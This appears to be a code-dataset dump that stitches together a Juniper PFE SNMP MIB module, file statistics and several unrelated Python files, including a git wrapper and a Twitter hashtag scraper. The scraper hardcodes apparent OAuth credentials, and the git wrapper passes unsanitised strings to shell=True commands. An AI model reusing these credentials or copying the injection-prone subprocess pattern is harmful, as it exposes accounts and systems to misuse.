if mibBuilder.loadTexts: jnxPfeNotifyTypeInput.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeInput.setDescription("Count of notifications whose associated packets were DMA'ed into route processor memory.")
jnxPfeNotifyTypeFailed = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyTypeFailed.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeFailed.setDescription('Count of failures in parsing the notifications.')
jnxPfeNotifyTypeIgnored = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyTypeIgnored.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeIgnored.setDescription('Count of notifications where the notification type in the message does not match any of the valid types.')
jnxPfeMemoryErrorsTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 3), )
if mibBuilder.loadTexts: jnxPfeMemoryErrorsTable.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryErrorsTable.setDescription('This provides PFE memory errors')
jnxPfeMemoryErrorsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 3, 1), ).setIndexNames((0, "JUNIPER-PFE-MIB", "jnxPfeFpcSlot"), (0, "JUNIPER-PFE-MIB", "jnxPfeSlot"))
if mibBuilder.loadTexts: jnxPfeMemoryErrorsEntry.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryErrorsEntry.setDescription('')
jnxPfeFpcSlot = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647)))
if mibBuilder.loadTexts: jnxPfeFpcSlot.setStatus('current')
if mibBuilder.loadTexts: jnxPfeFpcSlot.setDescription('The FPC slot number for this set of PFE notification')
jnxPfeSlot = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647)))
if mibBuilder.loadTexts: jnxPfeSlot.setStatus('current')
if mibBuilder.loadTexts: jnxPfeSlot.setDescription('The pfe slot number for this set of errors')
jnxPfeParityErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 3, 1, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeParityErrors.setStatus('current')
if mibBuilder.loadTexts: jnxPfeParityErrors.setDescription('The parity error count')
jnxPfeEccErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 3, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeEccErrors.setStatus('current')
if mibBuilder.loadTexts: jnxPfeEccErrors.setDescription('The ECC error count')
pfeMemoryErrorsNotificationPrefix = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 0))
pfeMemoryErrors = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 0, 1)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeParityErrors"), ("JUNIPER-PFE-MIB", "jnxPfeEccErrors"))
if mibBuilder.loadTexts: pfeMemoryErrors.setStatus('current')
if mibBuilder.loadTexts: pfeMemoryErrors.setDescription('A pfeMemoryErrors notification is sent when the value of jnxPfeParityErrors or jnxPfeEccErrors increases.')
jnxPfeMemory = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2))
jnxPfeMemoryUkernTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 1), )
if mibBuilder.loadTexts: jnxPfeMemoryUkernTable.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryUkernTable.setDescription('This table provides global PFE ukern memory statistics for specified slot.')
jnxPfeMemoryUkernEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 1, 1), ).setIndexNames((0, "JUNIPER-PFE-MIB", "jnxPfeGlSlot"))
if mibBuilder.loadTexts: jnxPfeMemoryUkernEntry.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryUkernEntry.setDescription('Entry represent ukern memory percentage free.')
jnxPfeMemoryUkernFreePercent = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 1, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 100))).setUnits('percent').setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeMemoryUkernFreePercent.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryUkernFreePercent.setDescription('The percent PFE ukern memory free within ukern heap.')
jnxPfeMemoryForwardingTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 2), )
if mibBuilder.loadTexts: jnxPfeMemoryForwardingTable.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryForwardingTable.setDescription('This table provides PFE ASIC memory - NH/JTREE or FW/Filter or Encap memory utilization statistics.')
jnxPfeMemoryForwardingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 2, 1), ).setIndexNames((0, "JUNIPER-PFE-MIB", "jnxPfeGlSlot"), (0, "JUNIPER-PFE-MIB", "jnxPfeMemoryForwardingChipSlot"), (0, "JUNIPER-PFE-MIB", "jnxPfeMemoryType"))
if mibBuilder.loadTexts: jnxPfeMemoryForwardingEntry.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryForwardingEntry.setDescription('Entry represent ASIC memory free percent of a specific type in specified pfe instance')
jnxPfeMemoryForwardingChipSlot = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 3)))
if mibBuilder.loadTexts: jnxPfeMemoryForwardingChipSlot.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryForwardingChipSlot.setDescription('ASIC instance number or pfe complex instance number.')
jnxPfeMemoryType = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 2, 1, 2), JnxPfeMemoryTypeEnum())
if mibBuilder.loadTexts: jnxPfeMemoryType.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryType.setDescription('PFE ASIC memory type, nh = 1, fw = 2, encap = 3.')
jnxPfeMemoryForwardingPercentFree = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 2, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 100))).setUnits('percent').setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeMemoryForwardingPercentFree.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryForwardingPercentFree.setDescription('Percentage ASIC memory free for a specific memory type. For Trio based linecards Encap memory is not available.Hence no value is returned')
jnxPfeMemoryTrapVars = ObjectIdentity((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 3))
if mibBuilder.loadTexts: jnxPfeMemoryTrapVars.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryTrapVars.setDescription('PFE notification object definitions.')
jnxPfeGlSlot = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 3, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: jnxPfeGlSlot.setStatus('current')
if mibBuilder.loadTexts: jnxPfeGlSlot.setDescription('Global slot number for line card resource monitoring.')
jnxPfeInstanceNumber = MibScalar((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 3, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 3))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: jnxPfeInstanceNumber.setStatus('current')
if mibBuilder.loadTexts: jnxPfeInstanceNumber.setDescription('PFE instance number in pfe complex.')
jnxPfeMemoryThreshold = MibScalar((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 3, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 100))).setUnits('percent').setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: jnxPfeMemoryThreshold.setStatus('current')
if mibBuilder.loadTexts: jnxPfeMemoryThreshold.setDescription('Configured high memory utilization threshold.')
jnxPfeMemoryNotificationsPrefix = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4))
jnxPfeMemoryNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0))
jnxPfeHeapMemoryThresholdExceeded = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 1)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeHeapMemoryThresholdExceeded.setStatus('current')
if mibBuilder.loadTexts: jnxPfeHeapMemoryThresholdExceeded.setDescription('Indicates that the Heap Memory utilization has crossed the configured watermark.')
jnxPfeHeapMemoryThresholdAbated = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 2)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeHeapMemoryThresholdAbated.setStatus('current')
if mibBuilder.loadTexts: jnxPfeHeapMemoryThresholdAbated.setDescription('Indicates that the Heap Memory utilization has fallen below the configured watermark.')
jnxPfeNextHopMemoryThresholdExceeded = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 3)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeInstanceNumber"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeNextHopMemoryThresholdExceeded.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNextHopMemoryThresholdExceeded.setDescription('Indicates that the Next Hop Memory utilization has crossed the configured watermark.')
jnxPfeNextHopMemoryThresholdAbated = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 4)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeInstanceNumber"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeNextHopMemoryThresholdAbated.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNextHopMemoryThresholdAbated.setDescription('Indicates that the Next Hop Memory utilization has fallen below the configured watermark.')
jnxPfeFilterMemoryThresholdExceeded = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 5)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeInstanceNumber"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeFilterMemoryThresholdExceeded.setStatus('current')
if mibBuilder.loadTexts: jnxPfeFilterMemoryThresholdExceeded.setDescription('Indicates that the Filter Memory utilization has crossed the configured watermark.')
jnxPfeFilterMemoryThresholdAbated = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 6)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeInstanceNumber"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeFilterMemoryThresholdAbated.setStatus('current')
if mibBuilder.loadTexts: jnxPfeFilterMemoryThresholdAbated.setDescription('Indicates that the Filter Memory utilization has fallen below the configured watermark.')
jnxPfeEncapMemoryThresholdExceeded = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 7)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeInstanceNumber"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeEncapMemoryThresholdExceeded.setStatus('current')
if mibBuilder.loadTexts: jnxPfeEncapMemoryThresholdExceeded.setDescription('Indicates that the ENCAP Memory utilization has crossed the configured watermark.')
jnxPfeEncapMemoryThresholdAbated = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 8)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeInstanceNumber"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeEncapMemoryThresholdAbated.setStatus('current')
if mibBuilder.loadTexts: jnxPfeEncapMemoryThresholdAbated.setDescription('Indicates that the ENCAP Memory utilization has fallen below the configured watermark.')
mibBuilder.exportSymbols("JUNIPER-PFE-MIB", jnxPfeNotifyTypeTable=jnxPfeNotifyTypeTable, jnxPfeNotifyGlTtlExcErrors=jnxPfeNotifyGlTtlExcErrors, jnxPfeFpcSlot=jnxPfeFpcSlot, jnxPfeNotifyTypeEntry=jnxPfeNotifyTypeEntry, jnxPfeMemoryUkernFreePercent=jnxPfeMemoryUkernFreePercent, jnxPfeEncapMemoryThresholdExceeded=jnxPfeEncapMemoryThresholdExceeded, jnxPfeMemoryNotifications=jnxPfeMemoryNotifications, jnxPfeNotifyGlSlot=jnxPfeNotifyGlSlot, jnxPfeNotifyTypeIgnored=jnxPfeNotifyTypeIgnored, jnxPfeMemoryForwardingEntry=jnxPfeMemoryForwardingEntry, jnxPfeSlot=jnxPfeSlot, jnxPfeMemoryType=jnxPfeMemoryType, jnxPfeMib=jnxPfeMib, jnxPfeNotifyGlOptTtlExp=jnxPfeNotifyGlOptTtlExp, jnxPfeMemoryUkernTable=jnxPfeMemoryUkernTable, PYSNMP_MODULE_ID=jnxPfeMib, jnxPfeNotifyGlAged=jnxPfeNotifyGlAged, pfeMemoryErrors=pfeMemoryErrors, jnxPfeMemoryTrapVars=jnxPfeMemoryTrapVars, jnxPfeNotifyTypeDescr=jnxPfeNotifyTypeDescr, jnxPfeMemoryErrorsEntry=jnxPfeMemoryErrorsEntry, jnxPfeFilterMemoryThresholdExceeded=jnxPfeFilterMemoryThresholdExceeded, jnxPfeNotifyGlCorrupt=jnxPfeNotifyGlCorrupt, jnxPfeNextHopMemoryThresholdAbated=jnxPfeNextHopMemoryThresholdAbated, jnxPfeNotifyGlPktGetFails=jnxPfeNotifyGlPktGetFails, jnxPfeNotifyGlGiants=jnxPfeNotifyGlGiants, jnxPfeNotifyGlDiscSample=jnxPfeNotifyGlDiscSample, jnxPfeNotifyTypeParsed=jnxPfeNotifyTypeParsed, jnxPfeMemoryForwardingChipSlot=jnxPfeMemoryForwardingChipSlot, jnxPfeHeapMemoryThresholdExceeded=jnxPfeHeapMemoryThresholdExceeded, jnxPfeMemoryNotificationsPrefix=jnxPfeMemoryNotificationsPrefix, jnxPfeEccErrors=jnxPfeEccErrors, jnxPfeNotifyTypeFailed=jnxPfeNotifyTypeFailed, jnxPfeMemoryErrorsTable=jnxPfeMemoryErrorsTable, jnxPfeNotifyGlUnknowns=jnxPfeNotifyGlUnknowns, jnxPfeNotifyGlSvcOptAsp=jnxPfeNotifyGlSvcOptAsp, JnxPfeMemoryTypeEnum=JnxPfeMemoryTypeEnum, jnxPfeNextHopMemoryThresholdExceeded=jnxPfeNextHopMemoryThresholdExceeded, jnxPfeNotifyGlDmaFails=jnxPfeNotifyGlDmaFails, jnxPfeGlSlot=jnxPfeGlSlot, jnxPfeHeapMemoryThresholdAbated=jnxPfeHeapMemoryThresholdAbated, jnxPfeNotification=jnxPfeNotification, jnxPfeNotifyGlTable=jnxPfeNotifyGlTable, jnxPfeNotifyGlParAccSec=jnxPfeNotifyGlParAccSec, jnxPfeFilterMemoryThresholdAbated=jnxPfeFilterMemoryThresholdAbated, jnxPfeParityErrors=jnxPfeParityErrors, jnxPfeNotifyGlSvcOptRe=jnxPfeNotifyGlSvcOptRe, jnxPfeMemoryForwardingTable=jnxPfeMemoryForwardingTable, jnxPfeNotifyGlSample=jnxPfeNotifyGlSample, jnxPfeNotifyGlParsed=jnxPfeNotifyGlParsed, jnxPfeNotifyGlIllegal=jnxPfeNotifyGlIllegal, jnxPfeMemoryForwardingPercentFree=jnxPfeMemoryForwardingPercentFree, jnxPfeEncapMemoryThresholdAbated=jnxPfeEncapMemoryThresholdAbated, jnxPfeNotifyTypeInput=jnxPfeNotifyTypeInput, jnxPfeNotifyGlEntry=jnxPfeNotifyGlEntry, jnxPfeNotifyGlDmaTotals=jnxPfeNotifyGlDmaTotals, jnxPfeMemoryUkernEntry=jnxPfeMemoryUkernEntry, jnxPfeNotifyGlTtlExceeded=jnxPfeNotifyGlTtlExceeded, jnxPfeNotifyGlRateLimited=jnxPfeNotifyGlRateLimited, jnxPfeInstanceNumber=jnxPfeInstanceNumber, jnxPfeMemoryThreshold=jnxPfeMemoryThreshold, jnxPfeNotifyGlPostSvcOptOut=jnxPfeNotifyGlPostSvcOptOut, pfeMemoryErrorsNotificationPrefix=pfeMemoryErrorsNotificationPrefix, jnxPfeNotifyTypeId=jnxPfeNotifyTypeId, jnxPfeMemory=jnxPfeMemory)
| 138.550725 | 3,195 | 0.792329 | 3,270 | 28,680 | 6.948624 | 0.137003 | 0.062847 | 0.109982 | 0.011091 | 0.449784 | 0.322287 | 0.256183 | 0.236775 | 0.19655 | 0.179342 | 0 | 0.056271 | 0.090377 | 28,680 | 206 | 3,196 | 139.223301 | 0.814704 | 0.011297 | 0 | 0 | 0 | 0.050761 | 0.295799 | 0.011077 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035533 | 0 | 0.060914 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f78d723f4ed254f9db1cfbb4a3d36e1a79d103f2 | 2,871 | py | Python | container_builder/src/repos.py | bandit145/container-builder | d5954e6517dfd8ce8050466bf7099879a84e24a8 | [
"MIT"
] | 1 | 2021-03-31T18:04:39.000Z | 2021-03-31T18:04:39.000Z | container_builder/src/repos.py | bandit145/container-builder | d5954e6517dfd8ce8050466bf7099879a84e24a8 | [
"MIT"
] | null | null | null | container_builder/src/repos.py | bandit145/container-builder | d5954e6517dfd8ce8050466bf7099879a84e24a8 | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
import subprocess
import os
from container_builder.src.exceptions import RepoException
class Repo(ABC):
repo_url = None
release = None
repo_dir = None
name = None
def __init__(self, repo_url, repo_dir, name):
self.repo_url = repo_url
self.name = name
self.repo_dir = repo_dir
self.path = f"{self.repo_dir}/{self.name}"
@abstractmethod
def update(self):
pass
@abstractmethod
def configure(self):
pass
@abstractmethod
def cleanup(self):
pass
class NoRepo(Repo):
def __init__(self, repo_dir, **kwargs):
super().__init__(None, None, None)
def update(self):
pass
def configure(self):
pass
def cleanup(self):
pass
class TestRepo(Repo):
def __init__(self, repo_dir, **kwargs):
super().__init__(kwargs["url"], repo_dir, kwargs["name"])
def update(self):
pass
def configure(self):
pass
def cleanup(self):
pass
class Git(Repo):
def __init__(self, repo_dir, **kwargs):
if "name" not in kwargs.keys():
name = kwargs["url"].split("/")[-1].split(".")[0]
super().__init__(kwargs["url"], repo_dir, name)
def update(self):
if os.path.exists(f"{self.repo_dir}/{self.name}"):
output = subprocess.run(
"git fetch --all --tags",
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
cwd=f"{self.repo_dir}/{self.name}",
)
else:
output = subprocess.run(
f"git clone {self.repo_url} {self.name}",
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
cwd=self.repo_dir,
)
if output.returncode != 0:
raise RepoException(output.stdout)
def set_branch(self, branch):
# not used for anything yet but it should be used to reset to a working branch
# current_branch = str(
# subprocess.run(
# f"git branch --show-current",
# shell=True,
# stdout=subprocess.PIPE,
# stderr=subprocess.STDOUT,
# cwd=f"{self.repo_dir}/{self.name}",
# check=True,
# ).stdout
# ).strip("\n")
output = subprocess.run(
f"git checkout {branch}",
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
cwd=f"{self.repo_dir}/{self.name}",
)
if output.returncode != 0:
raise RepoException(output.stdout)
def cleanup(self):
pass
def configure(self, branch):
self.update()
self.set_branch(branch)
| 24.965217 | 86 | 0.538837 | 319 | 2,871 | 4.68652 | 0.238245 | 0.070234 | 0.073579 | 0.040134 | 0.519064 | 0.456856 | 0.402676 | 0.383946 | 0.383946 | 0.228763 | 0 | 0.002124 | 0.344131 | 2,871 | 114 | 87 | 25.184211 | 0.791822 | 0.115987 | 0 | 0.5625 | 0 | 0 | 0.081948 | 0.042755 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2125 | false | 0.125 | 0.05 | 0 | 0.3625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
f79cc4c44977baae5aece467257b0049dda58c23 | 212 | py | Python | src/python/create_view/other/implement_each.py | Cogmob/tag | b90429bd8fd731489a22e5b65aea63e43ba064b2 | [
"Apache-2.0"
] | null | null | null | src/python/create_view/other/implement_each.py | Cogmob/tag | b90429bd8fd731489a22e5b65aea63e43ba064b2 | [
"Apache-2.0"
] | null | null | null | src/python/create_view/other/implement_each.py | Cogmob/tag | b90429bd8fd731489a22e5b65aea63e43ba064b2 | [
"Apache-2.0"
] | null | null | null | def implement_each(folder, each):
folder['tags'] = each['tags'] + folder['tags']
for key, tags in each['folders'].items():
folder['folders'][key] = {'tags': tags, 'folders': {}}
return folder
| 35.333333 | 62 | 0.59434 | 26 | 212 | 4.807692 | 0.423077 | 0.16 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193396 | 212 | 5 | 63 | 42.4 | 0.730994 | 0 | 0 | 0 | 0 | 0 | 0.174528 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e39ebdc561af3d06d359c73e39cf8392e83c7f27 | 2,607 | py | Python | social_media/twitter_get.py | TejasM/socialmedia | 84764b8f17c73b4991af4f711a27e11b9d95c264 | [
"MIT"
] | null | null | null | social_media/twitter_get.py | TejasM/socialmedia | 84764b8f17c73b4991af4f711a27e11b9d95c264 | [
"MIT"
] | null | null | null | social_media/twitter_get.py | TejasM/socialmedia | 84764b8f17c73b4991af4f711a27e11b9d95c264 | [
"MIT"
] | null | null | null | import datetime
import time
from email.utils import parsedate
from twitter import *
__author__ = 'tmehta'
# it's about time to create a TwitterSearch object with our secret tokens
t = Twitter(auth=OAuth('1363462640-Bwrpds3AK7UeCqEmvkrABfKdGfqzgl9pO3hJ1mk',
'7SFgvvflEchJxgyePZwiwQV6CYC7H7joVbSh8bjZM', 'phYQOWa0275clxNNPRz0rw',
'0vvkv6vGm2G9o1tLMtyn7KzObcmKEaMmK2MeAz3DdSw'))
def get_by_hash_tag(hash_tag, since_inner=datetime.datetime.today()):
q = hash_tag
oldest_id = TwitterEvent.objects.order_by('tweet_id')[0].tweet_id
for twe in t.search.tweets(q=q, count=1000, since_id=oldest_id, result_type='recent')[
'statuses']:
# GET OR CREATE FOLLOWER
try:
TwitterEvent.objects.get(tweet_id=twe['id'])
except TwitterEvent.DoesNotExist:
try:
follower = TwitterFollower.objects.get(twitter_id=twe['user']['id'])
except TwitterFollower.DoesNotExist:
print "Creating follower"
follower = TwitterFollower.objects.create(twitter_id=twe['user']['id'],
followers_count=twe['user']['followers_count'],
description=twe['user']['description'],
friends_count=twe['user']['friends_count'],
handle=twe['user']['screen_name'],
timezone=twe['user']['time_zone'])
# TODO: Update follower
# Create Tweet
date = datetime.datetime.fromtimestamp(time.mktime(parsedate(twe['created_at'])))
tw = TwitterEvent.objects.create(text=twe['text'], tweeted_at=date,
event_occurrence=date,
tweet_id=twe['id'], by=follower)
# TODO: Multiple Hash tags
tw.hash_tags = [HashTag.objects.get(tag_name=hash_tag).id]
tw.save()
if __name__ == "__main__":
since = datetime.datetime.today()
since = since - datetime.timedelta(days=1)
for tweet in t.search.tweets(q='lvg', count=1, since=since.strftime('%Y-%m-%d'))['statuses']:
# GET OR CREATE FOLLOWER
print tweet
else:
from dashboard.models import TwitterFollower, HashTag
from dashboard.models import TwitterEvent
for tag in HashTag.objects.all():
print tag.tag_name
get_by_hash_tag(tag.tag_name) | 45.736842 | 105 | 0.572305 | 262 | 2,607 | 5.519084 | 0.396947 | 0.033887 | 0.012448 | 0.016598 | 0.084371 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022714 | 0.324511 | 2,607 | 57 | 106 | 45.736842 | 0.79841 | 0.067894 | 0 | 0.046512 | 0 | 0 | 0.139026 | 0.064356 | 0 | 0 | 0 | 0.017544 | 0 | 0 | null | null | 0 | 0.139535 | null | null | 0.069767 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e39f3a209febcc055e07455d8891a812ce7bc63e | 417 | py | Python | hazard_detection/water_detection_functions.py | Vlad-Mocanu/hazard_detection | 6c3426847e90846347b7eb0f538b2c0854093b14 | [
"Apache-2.0"
] | 1 | 2018-03-10T11:02:25.000Z | 2018-03-10T11:02:25.000Z | hazard_detection/water_detection_functions.py | Vlad-Mocanu/hazard_detection | 6c3426847e90846347b7eb0f538b2c0854093b14 | [
"Apache-2.0"
] | null | null | null | hazard_detection/water_detection_functions.py | Vlad-Mocanu/hazard_detection | 6c3426847e90846347b7eb0f538b2c0854093b14 | [
"Apache-2.0"
] | null | null | null | import smtplib
import time
import datetime
import mail_functions
def get_flood_status(pin_value, email_subject_prefix, logging, config_options):
now = "[%s] " % datetime.datetime.now()
if pin_value:
mail_functions.sendEmail(email_subject_prefix + "Everything OK", logging, config_options)
else:
mail_functions.sendEmail(email_subject_prefix + "WATER DETECTED", logging, config_options)
| 29.785714 | 98 | 0.760192 | 52 | 417 | 5.788462 | 0.519231 | 0.129568 | 0.179402 | 0.179402 | 0.265781 | 0.265781 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155875 | 417 | 13 | 99 | 32.076923 | 0.855114 | 0 | 0 | 0 | 0 | 0 | 0.076739 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.4 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
e3a1eab2cc7862ddfcb20912649792e66d449c7a | 3,565 | py | Python | openstack/compute/v2/keypair.py | horion/openstacksdk | cbb0e12e1dc944847f2ba0e67bf35b9c7a67b3a3 | [
"Apache-2.0"
] | 99 | 2018-03-28T15:41:45.000Z | 2022-01-23T17:22:13.000Z | openstack/compute/v2/keypair.py | horion/openstacksdk | cbb0e12e1dc944847f2ba0e67bf35b9c7a67b3a3 | [
"Apache-2.0"
] | 5 | 2018-05-25T16:54:23.000Z | 2021-11-21T02:27:16.000Z | openstack/compute/v2/keypair.py | horion/openstacksdk | cbb0e12e1dc944847f2ba0e67bf35b9c7a67b3a3 | [
"Apache-2.0"
] | 104 | 2018-04-06T14:33:54.000Z | 2022-03-01T01:58:09.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack import resource
class Keypair(resource.Resource):
resource_key = 'keypair'
resources_key = 'keypairs'
base_path = '/os-keypairs'
_query_mapping = resource.QueryParameters(
'user_id')
# capabilities
allow_create = True
allow_fetch = True
allow_delete = True
allow_list = True
_max_microversion = '2.10'
# Properties
#: The date and time when the resource was created.
created_at = resource.Body('created_at')
#: A boolean indicates whether this keypair is deleted or not.
is_deleted = resource.Body('deleted', type=bool)
#: The short fingerprint associated with the ``public_key`` for
#: this keypair.
